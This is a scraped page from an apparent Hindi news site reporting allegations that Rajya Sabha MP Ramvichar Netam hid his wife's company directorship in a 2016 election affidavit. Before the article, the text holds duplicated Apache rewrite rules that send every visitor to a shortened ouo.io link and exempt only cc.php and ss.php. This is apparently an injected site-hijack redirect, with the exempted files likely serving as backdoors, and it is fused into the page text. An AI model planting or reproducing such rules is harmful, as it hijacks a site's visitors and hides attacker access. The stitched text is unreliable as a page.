
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 411
Previousरायपुर। शपथ पत्र में अपनी संपत्ति को छिपाना छत्तीसगढ़ से राज्यसभा सांसद को महंगा पड़ गया। बीजेपी के राज्यसभा सांसद रामविचार नेताम पर राज्यसभा चुनाव से पूर्व 29 मई 2016 को दिए गए शपथपत्र में अपनी पत्नी पुष्पा सिंह नेताम की संपत्ति छिपाने का गंभीर आरोप लगा है। आरटीआई से मिले दस्तावेजों के आधार पर ये आरोप लगाए गए हैं। राज्यसभा सांसद रामविचार नेताम पर आरोप है कि उनकी पत्नी पुष्पा सिंह नेताम गरिमा एडवाइजरी प्राइवेट लिमिटेड नामक कंपनी की डायरेक्टर हैं। इस कंपनी का वार्षिक टर्नओवर 8 करोड़ रुपए से अधिक का है। जबकि रामविचार नेताम ने अपने शपथपत्र में पत्नी के नाम से निजी कंपनी मॉ कुदरगरी बिजनेश प्राइवेट लिमिटेड में साढ़े दस लाख रुपए मूल्य के शेयर होने की जानकारी ही दी थी। छत्तीसगढ़ जनता कांग्रेस जे के प्रवक्ता संजीव अग्रवाल का कहना है कि मामले को गंभीरता से लिया जाना चाहिए। निर्वाचन आयोग से आय की जानकारी छिपाने का मामला सही साबित होने पर राज्यसभा की सदस्यता भी जा सकती है। संजीव का कहना है कि इस मामले की जांच कराई जानी चाहिए। राज्यसभा सांसद रामविचार नेताम पर अपनी पत्नी के नाम से जिस कंपनी में डायरेक्टर होने की जानकारी छिपाने का आरोप लगा है, पुष्पा सिंह नेताम ने उसी गरिमा एडवाइजरी प्राइवेट लिमिटेड के डायरेक्टर के पद से 1 अगस्त 2017 को इस्तीफा दे दिया। जबकि रामविचार नेताम ने 29 मई 2016 की स्थिति में शपत्र पत्र प्रस्तुत किया था।